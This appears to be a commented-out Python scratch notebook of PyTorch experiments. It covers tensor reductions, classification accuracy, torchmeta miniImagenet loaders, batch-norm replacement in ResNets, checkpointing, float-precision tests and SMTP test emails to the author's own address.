# If x is a 3D tensor, x.sum(1) yields a 2D tensor by aggregating over the D1 elements of dimension 1:
#     x.sum(1)[i, k] = op(x[i, :, k]) = op(x[i, 0, k], ..., x[i, D1 - 1, k])
# The key point: 3 indices are needed to select a single element of x. If only 2 are supplied (because one
# dimension is collapsed), D1 candidate elements remain, and the op (sum, max, ...) specifies how that set is
# reduced to a single value. Collapsing several dimensions at once works the same way, just over a larger set.
# """
#
# import torch
#
# x = torch.tensor([
# [1, 2, 3],
# [4, 5, 6]
# ])
#
# print(f'x.size() = {x.size()}')
#
# # sum the 0th dimension (rows). So we get a bunch of colums that have the rows added together.
# x0 = x.sum(0)
# print(x0)
#
# # sum the 1th dimension (columns)
# x1 = x.sum(1)
# print(x1)
#
# x_1 = x.sum(-1)
# print(x_1)
#
# x0 = x.max(0)
# print(x0.values)
#
# y = torch.tensor([[
# [1, 2, 3, 4],
# [5, 6, 7, 8],
# [9, 10, 11, 12]],
#
# [[13, 14, 15, 16],
# [17, 18, 19, 20],
# [21, 22, 23, 24]]])
#
# print(y)
#
# # into the screen [1, 13]
# print(y[:, 0, 0])
# # columns [1, 5, 9]
# print(y[0, :, 0])
# # rows [1, 2, 3, 4]
# print(y[0, 0, :])
#
# # for each remaining index, select the largest value in the "screen" dimension
# y0 = y.max(0)
# print(y0.values)
#
#
# # %%
#
# # understanding making label predictions
# # https://discuss.pytorch.org/t/how-does-one-get-the-predicted-classification-label-from-a-pytorch-model/91649/3?u=brando_miranda
#
# def calc_accuracy(mdl, X, Y):
# # reduce/collapse the classification dimension according to max op
# # resulting in most likely label
# max_vals, max_indices = mdl(X).max(1)
# # assumes the first dimension is batch size
# n = max_indices.size(0) # index 0 for extracting the # of elements
# # calulate acc (note .item() to do float division)
# acc = (max_indices == Y).sum().item() / n
# return acc
#
#
# import torch
# import torch.nn as nn
#
# # data dimension [batch-size, D]
# D, Dout = 1, 5
# batch_size = 16
# x = torch.randn(batch_size, D)
# y = torch.randint(low=0, high=Dout, size=(batch_size,))
#
# mdl = nn.Linear(D, Dout)
# logits = mdl(x)
# print(f'y.size() = {y.size()}')
# # removes the 1th dimension with a max, which is the classification layer
# # which means it returns the most likely label. Also, note you need to choose .indices since you want to return the
# # position of where the most likely label is (not it's raw logit value)
# pred = logits.max(1).indices
# print(pred)
#
# print('--- preds vs truth ---')
# print(f'predictions = {pred}')
# print(f'y = {y}')
#
# acc = (pred == y).sum().item() / pred.size(0)
# print(acc)
# print(calc_accuracy(mdl, x, y))
#
# # %%
#
# # https://discuss.pytorch.org/t/runtimeerror-element-0-of-variables-does-not-require-grad-and-does-not-have-a-grad-fn/11074/20
#
# import torch
# import torch.nn as nn
#
# x = torch.randn(1)
# mdl = nn.Linear(1, 1)
#
# y = mdl(x)
# print(mdl.weight)
#
# print(y)
#
# # %%
#
# # https://discuss.pytorch.org/t/how-to-get-the-module-names-of-nn-sequential/39682
# # looping through modules but get the one with a specific name
#
# import torch
# import torch.nn as nn
#
# from collections import OrderedDict
#
# params = OrderedDict([
# ('fc0', nn.Linear(in_features=4, out_features=4)),
# ('ReLU0', nn.ReLU()),
# ('fc1L:final', nn.Linear(in_features=4, out_features=1))
# ])
# mdl = nn.Sequential(params)
#
# # throws error
# # mdl['fc0']
#
# for m in mdl.children():
# print(m)
#
# print()
#
# for m in mdl.modules():
# print(m)
#
# print()
#
# for name, m in mdl.named_modules():
# print(name)
# print(m)
#
# print()
#
# for name, m in mdl.named_children():
# print(name)
# print(m)
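#
# # The cell's goal ("get the one with a specific name") can also be done directly; a minimal sketch using
# # the mdl built above (indexing like mdl['fc0'] fails, but these lookups work):
# fc0_a = getattr(mdl, 'fc0')  # attribute access by name
# fc0_b = dict(mdl.named_modules())['fc0']  # build a name -> module mapping and index it
# print(fc0_a is fc0_b)  # same module object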
#
# # %%
#
# # apply mdl to x until the final layer, then return the embeding
#
# import torch
# import torch.nn as nn
#
# from collections import OrderedDict
#
# Din, Dout = 1, 1
# H = 10
#
# modules = OrderedDict([
# ('fc0', nn.Linear(in_features=Din, out_features=H)),
# ('ReLU0', nn.ReLU()),
#
# ('fc1', nn.Linear(in_features=H, out_features=H)),
# ('ReLU1', nn.ReLU()),
#
# ('fc2', nn.Linear(in_features=H, out_features=H)),
# ('ReLU2', nn.ReLU()),
#
# ('fc3', nn.Linear(in_features=H, out_features=H)),
# ('ReLU3', nn.ReLU()),
#
# ('fc4L:final', nn.Linear(in_features=H, out_features=Dout))
# ])
#
# mdl = nn.Sequential(modules)
#
# x = torch.randn(4, Din)
# out = x
# for name, m in mdl.named_children():
# if 'final' in name:
# # return out
# break
# out = m(out)
#
# print(out.size())
#
# # %%
#
# # initializing a constant weight net
# # https://discuss.pytorch.org/t/how-to-add-appropriate-noise-to-a-neural-network-with-constant-weights-so-that-back-propagation-training-works/93411
#
# # import torch
#
# # [layer.reset_parameters() for layer in base_model.children() if hasattr(layer, 'reset_parameters')]
#
# # model = nn.Linear(1, 1)
# # model_copy = copy.deepcopy(model)
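#
# # A minimal sketch of the idea behind the link above (assumed setup, not the thread's exact code): set every
# # parameter to a constant, then add small Gaussian noise so backprop can break the symmetry.
# import copy
# import torch
# import torch.nn as nn
#
# const_model = nn.Linear(1, 1)
# with torch.no_grad():
#     nn.init.constant_(const_model.weight, 1.0)
#     nn.init.constant_(const_model.bias, 1.0)
#     for p in const_model.parameters():
#         p.add_(torch.randn_like(p) * 1e-2)  # small perturbation around the constant value
# model_copy = copy.deepcopy(const_model)
# print(const_model.weight)
# print(model_copy.weight)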
#
# # %%
#
# print('start')
#
# # f_avg: PLinReg vs MAML
#
# import numpy as np
# import matplotlib.pyplot as plt
# from pathlib import Path
#
# datas_std = [0.1, 0.125, 0.1875, 0.2]
#
# pl = [2.3078539778125768e-07,
# 1.9997889411762922e-07,
# 2.729681222011256e-07,
# 3.2532371115080884e-07]
# pl_stds = [1.4852212316567463e-08,
# 5.090588920661132e-09,
# 1.1424832554909115e-08,
# 5.058656213138166e-08]
#
# maml = [3.309504692539563e-07,
# 4.1058904888091606e-06,
# 6.8326703386053605e-06,
# 7.4616147721799645e-06]
# maml_stds = [4.039131189060566e-08,
# 3.66839089258494e-08,
# 9.20683484136399e-08,
# 9.789292209743077e-08]
#
# # fig = plt.figure()
# fig, ax = plt.subplots(nrows=1, ncols=1)
#
# ax.set_title('MAML vs Pre-Trained embedding with Linear Regression')
#
# x = datas_std
#
# ax.errorbar(x, pl, yerr=pl_stds, label='PLinReg', marker='o')
# ax.errorbar(x, maml, yerr=maml_stds, label='MAML', marker='o')
# ax.plot()
# ax.legend()
#
# ax.set_xlabel('std (of FNN Data set)')
# ax.set_ylabel('meta-test loss (MSE)')
#
# plt.show()
#
# # path = Path('~/ultimate-utils/plot').expanduser()
# # fig.savefig(path)
#
# print('done \a')
# # %%
#
# # Torch-meta miniImagenet
# # loop through meta-batches of this data set, print the size, make sure it's the size you exepct
#
# import torchmeta
# from torchmeta.utils.data import BatchMetaDataLoader
# from torchmeta.transforms import ClassSplitter
# # from torchmeta.toy import Sinusoid
#
# from tqdm import tqdm
#
# # dataset = Sinusoid(num_samples_per_task=100, num_tasks=20)
# dataset = torchmeta.datasets.MiniImagenet(data_path, num_classes_per_task=5, meta_train=True, download=True)
# print(f'type(metaset_miniimagenet) = {type(dataset)}')
# print(f'len(metaset_miniimagenet) = {len(dataset)}')
# shots, test_shots = 5, 15
# # get metaset
# metaset = ClassSplitter(
# dataset,
# num_train_per_class=shots,
# num_test_per_class=test_shots,
# shuffle=True)
# # get meta-dataloader
# batch_size = 16
# num_workers = 0
# meta_dataloader = BatchMetaDataLoader(metaset, batch_size=batch_size, num_workers=num_workers)
# epochs = 2
#
# print(f'batch_size = {batch_size}')
# print(f'len(metaset) = {len(metaset)}')
# print(f'len(meta_dataloader) = {len(meta_dataloader)}\n')
# with tqdm(range(epochs)) as tepochs:
# for epoch in tepochs:
# print(f'\n[epoch={epoch}]')
# for batch_idx, batch in enumerate(meta_dataloader):
# print(f'batch_idx = {batch_idx}')
# train_inputs, train_targets = batch['train']
# test_inputs, test_targets = batch['test']
# print(f'train_inputs.shape = {train_inputs.shape}')
# print(f'train_targets.shape = {train_targets.shape}')
# print(f'test_inputs.shape = {test_inputs.shape}')
# print(f'test_targets.shape = {test_targets.shape}')
# print()
#
# # %%
#
# import torch
#
# x = torch.tensor([1., 2, 3])
# print(x.mean())
#
# print(x * x)
# print(x @ x)
# print(x.matmul(x))
#
# # x.mm(x) errors: torch.mm expects 2D matrices, so for 1D tensors use torch.dot or matmul instead
#
# # %%
#
# import torch
#
# x = torch.randn(12, 20)
# y = torch.randn(20, 30)
#
# out = x @ y
# print(out.size())
#
# # %%
# # https://www.youtube.com/watch?v=46RjXawJQgg&t=1493s
#
# from pathlib import Path
#
# from pandas import read_csv
#
# read_csv(Path())
#
# # %%
#
# print('hello-world')
# xx = 2
#
# print(xx)
#
# print(' ')
#
# ##
# print('end!')
#
# # %%
#
# # let's see how big the random values from the normal are
#
# import torch
#
# D = 8
# w = torch.tensor([0.1] * D)
# print(f'w.size() = {w.size()}')
# mu = torch.zeros(w.size())
# std = w * 1.5e-2 # two decimal places and a little more
# noise = torch.distributions.normal.Normal(loc=mu, scale=std).sample()
#
# print('--- noise ')
# print(noise.size())
# print(noise)
#
# w += noise
# print('--- w')
# print(w.size())
# print(w)
#
# # %%
#
# # editing parameters in pytorch in place without error: https://discuss.pytorch.org/t/how-are-layer-weights-and-biases-initialized-by-default/13073/41
#
# import torch
# import torch.nn as nn
# from collections import OrderedDict
#
# Din, Dout = 8, 1
#
# base_model = nn.Sequential(OrderedDict([
# ('f1', nn.Linear(Din, Dout)),
# ('out', nn.SELU())
# ]))
#
# with torch.no_grad():
# for i, w in enumerate(base_model.parameters()):
# print(f'--- i = {i}')
# print(w)
# w += w + 0.001
# print(w)
#
# # %%
#
# # pickle vs torch.save
#
# # def log_validation(args, meta_learner, outer_opt, meta_val_set):
# # """ Log the validation loss, acc. Checkpoint the model if that flag is on. """
# # if args.save_ckpt: # pickle vs torch.save https://discuss.pytorch.org/t/advantages-disadvantages-of-using-pickle-module-to-save-models-vs-torch-save/79016
# # # make dir to logs (and ckpts) if not present. Throw no exceptions if it already exists
# # path_to_ckpt = args.logger.current_logs_path
# # path_to_ckpt.mkdir(parents=True, exist_ok=True) # creates parents if not presents. If it already exists that's ok do nothing and don't throw exceptions.
# # ckpt_path_plus_path = path_to_ckpt / Path('db')
# #
# # args.base_model = "check the meta_learner field in the checkpoint not in the args field" # so that we don't save the child model so many times since it's part of the meta-learner
# # # note this obj has the last episode/outer_i we ran
# # torch.save({'args': args, 'meta_learner': meta_learner}, ckpt_path_plus_path)
# # acc_mean, acc_std, loss_mean, loss_std = meta_eval(args, meta_learner, meta_val_set)
# # if acc_mean > args.best_acc:
# # args.best_acc, args.loss_of_best = acc_mean, loss_mean
# # args.logger.loginfo(
# # f"***> Stats of Best Acc model: meta-val loss: {args.loss_of_best} +- {loss_std}, meta-val acc: {args.best_acc} +- {acc_std}")
# # return acc_mean, acc_std, loss_mean, loss_std
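#
# # (In short: torch.save serializes with pickle under the hood but handles tensor storages specially, so it
# # is the usual choice for checkpoints; plain pickle also works for whole nn.Module objects, as in the
# # earlier pickle cells.)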
#
# # %%
#
# import numpy as np
# from sklearn.linear_model import LinearRegression
#
# X = np.array([[1, 1], [1, 2], [2, 2], [2, 3]])
# # y = 1 * x_0 + 2 * x_1 + 3
# y = np.dot(X, np.array([1, 2])) + 3
# reg = LinearRegression()
# print(reg)
# reg = LinearRegression().fit(X, y)
# print(reg)
# reg.score(X, y)
#
# reg.coef_
#
# reg.intercept_
#
# reg.predict(np.array([[3, 5]]))
#
# # %%
#
# # https://stackoverflow.com/questions/63818676/what-is-the-machine-precision-in-pytorch-and-when-should-one-use-doubles
# # https://discuss.pytorch.org/t/how-does-one-start-using-double-without-unexpected-bugs/95715
# # https://discuss.pytorch.org/t/what-is-the-machine-precision-of-pytorch-with-cpus-or-gpus/9384
#
# import torch
#
# x1 = torch.tensor(1e-6)
# x2 = torch.tensor(1e-7)
# x3 = torch.tensor(1e-8)
# x4 = torch.tensor(1e-9)
#
# eps = torch.tensor(1e-11)
#
# print(x1.dtype)
# print(x1)
# print(x1 + eps)
#
# print(x2)
# print(x2 + eps)
#
# print(x3)
# print(x3 + eps)
#
# print(x4)
# print(x4 + eps)
#
# # %%
#
# # python float is a C double
# # NumPy's standard numpy.float is the same (so C double), also numpy.float64.
# # https://www.doc.ic.ac.uk/~eedwards/compsys/float/
# # https://stackoverflow.com/questions/1049722/what-is-2s-complement
# # https://www.cs.cornell.edu/~tomf/notes/cps104/twoscomp.html#whyworks
# # https://stackoverflow.com/questions/7524838/fixed-point-vs-floating-point-number
# # https://en.wikipedia.org/wiki/Single-precision_floating-point_format
# # https://www.cs.cornell.edu/~tomf/notes/cps104/twoscomp.html#whyworks
#
# import torch
#
# xf = torch.tensor(1e-7)
# xd = torch.tensor(1e-7, dtype=torch.double)
# epsf = torch.tensor(1e-11)
#
# print(xf.dtype)
# print(xf)
# print(xf.item())
# print(type(xf.item()))
#
# #
# print('\n> test when a+eps = a')
# print(xf.dtype)
# print(f'xf = {xf}')
# print(f'xf + 1e-7 = {xf + 1e-7}')
# print(f'xf + 1e-11 = {xf + 1e-11}')
# print(f'xf + 1e-8 = {xf + 1e-8}')
# print(f'xf + 1e-16 = {xf + 1e-16}')
# # after seeing the above it seems that there are errors if things are small
#
# print('\n> test when a+eps = a')
# x = torch.tensor(1e-7, dtype=torch.double)
# print(f'xf = {x}')
# print(f'xf + 1e-7 = {x + 1e-7}')
# print(f'xf + 1e-11 = {x + 1e-11}')
# print(f'xf + 1e-8 = {x + 1e-8}')
# print(f'xf + 1e-16 = {x + 1e-16}')
# # using doubles clearly is better but still has some errors
#
# print('\n> test when a+eps = a')
# x = torch.tensor(1e-4)
# print(f'xf = {x}')
# print(f'xf + 1e-7 = {x + 1e-7}')
# print(f'xf + 1e-11 = {x + 1e-11}')
# print(f'xf + 1e-8 = {x + 1e-8}')
# print(f'xf + 1e-16 = {x + 1e-16}')
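#
# # The float32/float64 thresholds can also be read off directly with torch.finfo; the machine epsilons
# # (~1.19e-7 for float32, ~2.22e-16 for float64) match the behaviour observed above.
# print(torch.finfo(torch.float32).eps)
# print(torch.finfo(torch.float64).eps)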
#
# # %%
#
# # https://pytorch.org/docs/stable/torchvision/models.html
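#
# # A minimal sketch of pulling a model from that zoo (assumes torchvision is installed; pretrained=False
# # skips the weight download, matching the resnet cells later in this file):
# import torchvision.models as models
# resnet18 = models.resnet18(pretrained=False)
# print(resnet18.fc)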
#
# # %%
#
# import torch
#
# print(torch.zeros(2))
# m = torch.distributions.MultivariateNormal(torch.zeros(2), torch.eye(2))
# x = m.sample()
# print(x)
#
# # m = torch.distributions.MultivariateNormal(torch.zeros(1, 3), torch.eye(1, 3))
# # mu = m.sample()
# # print(mu)
#
# m = torch.distributions.MultivariateNormal(torch.zeros(1, 5), torch.eye(5))
# y = m.sample()
# print(y)
#
# # %%
#
# from pathlib import Path
# import matplotlib.pyplot as plt
#
# import numpy as np
#
# path = Path('~/data/').expanduser()
#
# # x = np.linspace(0, 2*np.pi, 50)
# x = np.random.uniform(0, 2 * np.pi, 100)
# noise = np.random.normal(0.0, 0.05, 100)
# print(noise)
# y = np.sin(x) + noise
# plt.figure()
# plt.scatter(x, y)
# plt.ylabel('f(x)')
# plt.xlabel('x (raw feature)')
# plt.savefig(path / 'test_fig.pdf')
# plt.savefig(path / 'test_fig.png')
# plt.show()
#
# # %%
#
# from socket import gethostname
# from email.message import EmailMessage
# import smtplib
#
# server = smtplib.SMTP('smtp.gmail.com', 587)
# server.starttls()
# print(server)
#
# # %%
#
# # MTA (Mail Transfer Agent)
# # https://stackoverflow.com/questions/784201/is-there-a-python-mta-mail-transfer-agent
# # https://www.quora.com/How-does-one-send-e-mails-from-Python-using-MTA-Mail-Transfer-Agent-rather-than-an-SMTP-library
# # https://www.reddit.com/r/learnpython/comments/ixlq81/how_does_one_send_emails_from_python_using_mta/
#
# # Q why can't I just send an email directly?
# # Q why do smtp libraries exist
#
# # %%
#
# import smtplib
#
# server = smtplib.SMTP('smtp.intel-research.net', 25)
# server.starttls()
# print(server)
#
#
# # %%
#
# # from socket import gethostname
# # from email.message import EmailMessage
# # import smtplib
# #
# # server = smtplib.SMTP('smtp.gmail.com', 587)
# # server.starttls()
# # # not a real email account nor password, its all ok!
# # server.login('slurm.miranda@gmail.com', 'dummy123!@#$321')
# #
# # # craft message
# # msg = EmailMessage()
# #
# # message = f'{message}\nSend from Hostname: {gethostname()}'
# # msg.set_content(message)
# # msg['Subject'] = subject
# # msg['From'] = 'slurm.miranda@gmail.com'
# # msg['To'] = destination
# # # send msg
# # server.send_message(msg)
#
# # %%
#
# # send email with smtp intel
#
# def send_email(message):
# from socket import gethostname
# import smtplib
# hostname = gethostname()
# from_address = 'slurm.miranda@gmail.com'
# from_address = 'miranda9@intel-research.net.'
# # to_address = [ 'iam-alert@intel-research.net']
# to_address = ['brando.science@gmail.com']
# subject = f"Test msg from: {hostname}"
# ##
# message = f'Test msg from {hostname}: {message}'
# full_message = f'From: {from_address}\n' \
# f'To: {to_address}\n' \
# f'Subject: {subject}\n' \
# f'{message}'
# server = smtplib.SMTP('smtp.intel-research.net')
# server.sendmail(from_address, to_address, full_message)
# server.quit()
# # sys.exit(1)
#
#
# print('start')
# send_email('HelloWorld')
# print('done email test!')
#
#
# # %%
#
# def send_email2(message):
# from email.mime.multipart import MIMEMultipart
# from email.mime.text import MIMEText
# from socket import gethostname
# import smtplib
# server = smtplib.SMTP('smtp.intel-research.net')
# # craft message
# msg = MIMEMultipart()
#
# message = f'{message}\nSend from Hostname: {gethostname()}'
# msg['Subject'] = 'Test email'
# msg['From'] = 'miranda9@intel-research.net.'
# msg['To'] = 'brando.science@gmail.com'
# msg.attach(MIMEText(message, "plain"))
# # send message
# server.send_message(msg)
# # server.sendmail(from_address, to_address, full_message)
# server.quit()
#
#
# print('start')
# send_email2('HelloWorld')
# print('done email test!')
#
# #%%
#
# from pathlib import Path
#
# message = 'HelloWorld'
# path_to_pdf = Path('~/data/test_fig.pdf').expanduser()
#
# from email.mime.application import MIMEApplication
# from email.mime.multipart import MIMEMultipart
# from email.mime.text import MIMEText
# from socket import gethostname
# import smtplib
#
# server = smtplib.SMTP('smtp.intel-research.net')
# # craft message
# msg = MIMEMultipart()
#
# message = f'{message}\nSend from Hostname: {gethostname()}'
# msg['Subject'] = 'Test email'
# msg['From'] = 'miranda9@intel-research.net.'
# msg['To'] = 'brando.science@gmail.com'
# msg.attach(MIMEText(message, "plain"))
# # attach pdf
# if path_to_pdf.exists():
# with open(path_to_pdf, "rb") as f:
# # attach = email.mime.application.MIMEApplication(f.read(),_subtype="pdf")
# attach = MIMEApplication(f.read(), _subtype="pdf")
# attach.add_header('Content-Disposition', 'attachment', filename=str(path_to_pdf))
# msg.attach(attach)
#
# # send message
# server.send_message(msg)
# # server.sendmail(from_address, to_address, full_message)
# server.quit()
#
# #%%
#
# # Here, we used "w" letter in our argument, which indicates write and will create a file if it does not exist in library
# # Plus sign indicates both read and write.
#
# # with open('data.json', 'w+') as f:
# # json.dump(self.stats, f)
#
# #%%
#
# import numpy as np
# from torch.utils.tensorboard import SummaryWriter # https://deeplizard.com/learn/video/psexxmdrufm
#
# path = Path('~/data/logs/').expanduser()
# tb = SummaryWriter(log_dir=path)
# # tb = SummaryWriter(log_dir=args.current_logs_path)
#
# for i in range(3):
# loss = i + np.random.normal(loc=0, scale=1)
# tb.add_scalar('loss', loss, i)
#
# # %%
#
# # https://pytorch.org/tutorials/beginner/saving_loading_models.html
#
# # Saving & Loading Model for Inference
# # Save/Load state_dict (Recommended)
# # Save:
# # torch.save(model.state_dict(), PATH)
# #
# # # Load:
# # model = TheModelClass(*args, **kwargs)
# # model.load_state_dict(torch.load(PATH))
# # model.eval()
#
# # %%
#
# # Save:
# # torch.save({
# # 'epoch': epoch,
# # 'model_state_dict': model.state_dict(),
# # 'optimizer_state_dict': optimizer.state_dict(),
# # 'loss': loss,
# # ...
# # }, PATH)
# # # Load:
# # model = TheModelClass(*args, **kwargs)
# # optimizer = TheOptimizerClass(*args, **kwargs)
# #
# # checkpoint = torch.load(PATH)
# # model.load_state_dict(checkpoint['model_state_dict'])
# # optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
# # epoch = checkpoint['epoch']
# # loss = checkpoint['loss']
# #
# # model.eval()
# # # - or -
# # model.train()
#
# # %%
#
# # https://discuss.pytorch.org/t/how-does-load-a-sequential-model-from-a-string/97648
# # https://stackoverflow.com/questions/64109883/how-does-one-load-a-sequential-model-from-a-string-in-pytorch
#
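# # A minimal sketch of the round trip those threads discuss (same pattern as the checkpoint-loading code
# # further below). It relies on each layer's repr being a valid constructor call, which holds for simple
# # layers like Linear/SELU, and on those class names being importable so eval can resolve them.
# import torch.nn as nn
# from torch.nn import Linear, SELU  # needed so eval can resolve the layer names in the string
# from collections import OrderedDict
#
# f = nn.Sequential(OrderedDict([('fc1', nn.Linear(2, 1)), ('out', nn.SELU())]))
# db = {'f_modules_str': str(f._modules), 'f_state_dict': f.state_dict()}
# f2 = nn.Sequential(eval(db['f_modules_str']))
# f2.load_state_dict(db['f_state_dict'])
# print(f2)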
# # %%
#
# torch.save({'f': f,
# 'f_state_dict': f.state_dict(),
# 'f_str': str(f),
# 'f_modules': f._modules,
# 'f_modules_str': str(f._modules)
# }, path2avg_f)
#
# #%%
#
# from pathlib import Path
# from torch.utils.tensorboard import SummaryWriter
# import numpy as np
#
# path = Path('~/data/tb_test/').expanduser()
# # path = Path('~/logs/logs_Sep29_12-38-08_jobid_-1/tb').expanduser()
# writer = SummaryWriter(path)
#
# for n_iter in range(100):
# writer.add_scalar('Loss/train', np.random.random(), n_iter)
# writer.add_scalar('Loss/test', np.random.random(), n_iter)
# writer.add_scalar('Accuracy/train', np.random.random(), n_iter)
# writer.add_scalar('Accuracy/test', np.random.random(), n_iter)
#
# print('done! \a')
#
# #%%
#
# db = torch.load(str(args.resume_ckpt_path))
# # args.epchs = db['epoch'] # we can start counting from zero
# # args.epoch += 1 # this is needed so that it starts on the next batch since it says the last batch it *did* and range counts with 0 indexing.
# # meta_learner = db['meta_learner']
# args.base_model = db['f']
# # in case loading directly doesn't work
# modules = eval(db['f_modules_str'])
# args.base_model = torch.nn.Sequential(modules)
# f_state_dict = db['f_state_dict']
# args.base_model.load_state_dict(f_state_dict)
#
#
# #%%
#
# # Torch-meta miniImagenet
#
# import torchmeta
# from torchmeta.utils.data import BatchMetaDataLoader
# from torchmeta.transforms import ClassSplitter
#
# from pathlib import Path
#
# from tqdm import tqdm
#
# data_path = Path('~/data/').expanduser()
# meta_split = 'train'
# dataset = torchmeta.datasets.MiniImagenet(data_path, num_classes_per_task=5, meta_split=meta_split, download=True)
# # dataset = torchmeta.datasets.Omniglot(data_path, num_classes_per_task=5, meta_split=meta_split, download=True)
#
# print(f'type(metaset_miniimagenet) = {type(dataset)}')
# print(f'len(metaset_miniimagenet) = {len(dataset)}')
# shots, test_shots = 5, 15
# metaset = ClassSplitter(
# dataset,
# num_train_per_class=shots,
# num_test_per_class=test_shots,
# shuffle=True)
# batch_size = 16
# num_workers = 0
# meta_dataloader = BatchMetaDataLoader(metaset, batch_size=batch_size, num_workers=num_workers)
# epochs = 2
#
# print(f'batch_size = {batch_size}')
# print(f'len(metaset) = {len(metaset)}')
# print(f'len(meta_dataloader) = {len(meta_dataloader)}\n')
# with tqdm(range(epochs)) as tepochs:
# for epoch in tepochs:
# print(f'\n[epoch={epoch}]')
# for batch_idx, batch in enumerate(meta_dataloader):
# print(f'batch_idx = {batch_idx}')
# train_inputs, train_targets = batch['train']
# test_inputs, test_targets = batch['test']
# print(f'train_inputs.shape = {train_inputs.shape}')
# print(f'train_targets.shape = {train_targets.shape}')
# print(f'test_inputs.shape = {test_inputs.shape}')
# print(f'test_targets.shape = {test_targets.shape}')
# print()
# break
# break
#
# #%%
#
# from torchmeta.datasets.helpers import omniglot
# from torchmeta.datasets.helpers import miniimagenet
# from torchmeta.utils.data import BatchMetaDataLoader
#
# from pathlib import Path
#
# meta_split = 'train'
# data_path = Path('~/data/').expanduser()
# dataset = omniglot(data_path, ways=5, shots=5, test_shots=15, meta_split=meta_split, download=True)
# dataset = miniimagenet(data_path, ways=5, shots=5, test_shots=15, meta_split=meta_split, download=True)
# dataloader = BatchMetaDataLoader(dataset, batch_size=16, num_workers=4)
#
# for batch in dataloader:
# train_inputs, train_targets = batch["train"]
#     print('Train inputs shape: {0}'.format(train_inputs.shape))  # (16, 25, 3, 84, 84) for miniimagenet
# print('Train targets shape: {0}'.format(train_targets.shape)) # (16, 25)
#
# test_inputs, test_targets = batch["test"]
#     print('Test inputs shape: {0}'.format(test_inputs.shape))  # (16, 75, 3, 84, 84)
# print('Test targets shape: {0}'.format(test_targets.shape)) # (16, 75)
#
# #%%
#
# # replacing a module in in a pytorch model
# # https://discuss.pytorch.org/t/how-to-modify-a-pretrained-model/60509/11
#
# import torch
#
# from torchmeta.datasets.helpers import omniglot
# from torchmeta.datasets.helpers import miniimagenet
# from torchmeta.utils.data import BatchMetaDataLoader
#
# from pathlib import Path
#
# import copy
#
# meta_split = 'train'
# data_path = Path('~/data/').expanduser()
# dataset = omniglot(data_path, ways=5, shots=5, test_shots=15, meta_split=meta_split, download=True)
# dataset = miniimagenet(data_path, ways=5, shots=5, test_shots=15, meta_split=meta_split, download=True)
# dataloader = BatchMetaDataLoader(dataset, batch_size=16, num_workers=4)
#
#
#
# def replace_bn(module, name):
# """
# Recursively put desired batch norm in nn.module module.
#
# set module = net to start code.
# """
# # go through all attributes of module nn.module (e.g. network or layer) and put batch norms if present
# for attr_str in dir(module):
# target_attr = getattr(module, attr_str)
# if type(target_attr) == torch.nn.BatchNorm2d:
# new_bn = torch.nn.BatchNorm2d(target_attr.num_features, target_attr.eps, target_attr.momentum, target_attr.affine,
# track_running_stats=False)
# setattr(module, attr_str, new_bn)
#
# # iterate through immediate child modules. Note, the recursion is done by our code no need to use named_modules()
# for name, immediate_child_module in module.named_children():
# replace_bn(immediate_child_module, name)
#
# def convert_bn(model):
# for module in model.modules():
# if isinstance(module, torch.nn.modules.batchnorm._BatchNorm):
# module.__init__(module.num_features, module.eps,
# module.momentum, module.affine,
# track_running_stats=False)
#
# fc_out_features = 5
#
# # model = torch.hub.load('pytorch/vision:v0.6.0', 'resnet18', pretrained=False)
# # replace_bn(model, 'model')
# # model.fc = torch.nn.Linear(in_features=512, out_features=fc_out_features, bias=True)
# #
# # model = torch.hub.load('pytorch/vision:v0.6.0', 'resnet50', pretrained=False)
# # replace_bn(model, 'model')
# # model.fc = torch.nn.Linear(in_features=2048, out_features=fc_out_features, bias=True)
#
# # model = torch.hub.load('pytorch/vision:v0.6.0', 'resnet101', pretrained=False)
# # replace_bn(model, 'model')
# # model.fc = torch.nn.Linear(in_features=2048, out_features=fc_out_features, bias=True)
#
# model = torch.hub.load('pytorch/vision:v0.6.0', 'resnet152', pretrained=False)
# replace_bn(model, 'model')
# model.fc = torch.nn.Linear(in_features=2048, out_features=fc_out_features, bias=True)
#
# for batch in dataloader:
# train_inputs, train_targets = batch["train"]
#     print('Train inputs shape: {0}'.format(train_inputs.shape))  # (16, 25, 3, 84, 84) for miniimagenet
# print('Train targets shape: {0}'.format(train_targets.shape)) # (16, 25)
# test_inputs, test_targets = batch["test"]
#     print('Test inputs shape: {0}'.format(test_inputs.shape))  # (16, 75, 3, 84, 84)
# print('Test targets shape: {0}'.format(test_targets.shape)) # (16, 75)
# first_meta_batch = train_inputs[0] # task
# nk_task = first_meta_batch
# out = model(nk_task)
# print(f'resnet out.size(): {out.size()}')
# break
#
# print('success\a')
#
# # %%
#
# import torch
#
# import torchvision.transforms as transforms
#
# # import torchmeta
# # from torchmeta.datasets.helpers import omniglot
# from torchmeta.datasets.helpers import miniimagenet
# from torchmeta.utils.data import BatchMetaDataLoader
#
# from pathlib import Path
#
# meta_split = 'train'
# data_path = Path('~/data/').expanduser()
#
# normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
# data_augmentation_transforms = transforms.Compose([
# transforms.RandomResizedCrop(84),
# transforms.RandomHorizontalFlip(),
# transforms.ColorJitter(
# brightness=0.4,
# contrast=0.4,
# saturation=0.4,
# hue=0.2),
# transforms.ToTensor(),
# normalize])
# dataset = miniimagenet(data_path,
# transform=data_augmentation_transforms,
# ways=5, shots=5, test_shots=15, meta_split=meta_split, download=True)
# dataloader = BatchMetaDataLoader(dataset, batch_size=16, num_workers=4)
#
# model = torch.hub.load('pytorch/vision:v0.6.0', 'resnet18', pretrained=False)
#
# print(len(dataloader))
# # for batch_idx, batch in enumerate(dataloader):
# # print(f'--> batch_idx = {batch_idx}')
# # train_inputs, train_targets = batch["train"]
# # print('Train inputs shape: {0}'.format(train_inputs.shape)) # (16, 25, 1, 28, 28)
# # print('Train targets shape: {0}'.format(train_targets.shape)) # (16, 25)
# # test_inputs, test_targets = batch["test"]
# # print('Test inputs shape: {0}'.format(test_inputs.shape)) # (16, 75, 1, 28, 28)
# # print('Test targets shape: {0}'.format(test_targets.shape)) # (16, 75)
# # first_meta_batch = train_inputs[0] # task
# # nk_task = first_meta_batch
# # out = model(nk_task)
# # print(f'resnet out.size(): {out.size()}')
# # break
#
# print('success\a')
#
# #%%
#
# import torch
#
# import torchvision.transforms as transforms
#
# # import torchmeta
# # from torchmeta.datasets.helpers import omniglot
# from torchmeta.datasets.helpers import miniimagenet
# from torchmeta.utils.data import BatchMetaDataLoader
#
# from pathlib import Path
#
# meta_split = 'train'
